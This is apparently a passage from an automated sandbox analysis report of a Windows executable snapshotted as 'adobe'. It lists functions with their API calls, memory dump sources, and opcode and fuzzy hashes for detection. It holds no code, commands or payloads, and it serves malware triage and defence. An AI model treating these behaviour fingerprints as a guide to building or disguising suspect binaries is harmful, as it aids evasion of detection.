                                                                                                                                                            • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                                            • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 296031713-0
                                                                                                                                                          • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                                                                          • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                                                                                          • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                                                                          • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004015C4 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 448 4015c4-401608 449 401646-40164c 448->449 450 40160a-401614 449->450 451 40164e-401655 449->451 452 401616 450->452 453 401618-40161c 450->453 452->453 454 401622-401624 453->454 455 40161e 453->455 456 401644 454->456 457 401626-401638 VirtualAlloc 454->457 455->454 456->449 457->456 458 40163a-401642 457->458 458->451
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401631
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID: Z
                                                                                                                                                          • API String ID: 4275171209-4052018393
                                                                                                                                                          • Opcode ID: 41bc2e58eb8df21134a81ecef240e945b9dbf0f5d11c2332597d90ea76119035
                                                                                                                                                          • Instruction ID: 625cd896077d7ae42c8eb3362da321aaa2c87eddc2731790e4d257a04fee8ae6
                                                                                                                                                          • Opcode Fuzzy Hash: 41bc2e58eb8df21134a81ecef240e945b9dbf0f5d11c2332597d90ea76119035
                                                                                                                                                          • Instruction Fuzzy Hash: 95113072A057019FC3109F19CD80A2BB7E5EBC4750F19CA3DE598A73A5D635AC408699
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00401658 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                          • String ID: Z
                                                                                                                                                          • API String ID: 1263568516-4052018393
                                                                                                                                                          • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                          • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                                                                          • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                          • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00406FA0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLibraryLoadMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2987862817-0
                                                                                                                                                          • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                                          • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                                                                          • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                                                                          • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040766C Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022803AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                          • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                                          • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                                                                          • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                                                                          • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040762C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1948546556-0
                                                                                                                                                          • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                          • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                                                                          • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                                                                          • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004075C4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022803AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                          • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                          • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                                                                                          • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                                                                                          • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00405270 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                                                                                            • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                                                                                            • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1658689577-0
                                                                                                                                                          • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                                                                          • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                                                                                                                          • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                                                                                                                          • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                          • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                          • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                                                                          • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                          • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                          • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                                          • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                                                                          • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                                          • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                          • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                                          • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                                                                                          • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                                          • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022803AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 442123175-0
                                                                                                                                                          • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                                          • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                                                                                          • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                                          • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FormatMessage
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1306739567-0
                                                                                                                                                          • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                                                                                          • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                                                                                          • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                                                                                                          • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetEndOfFile.KERNEL32(?,02297D68,0040A08C,00000000), ref: 004076B3
                                                                                                                                                            • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022803AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 734332943-0
                                                                                                                                                          • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                                          • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                                                                                          • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                                          • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                          • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                                          • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                                                                          • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                                          • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                          • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                          • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                                                                          • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                          • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
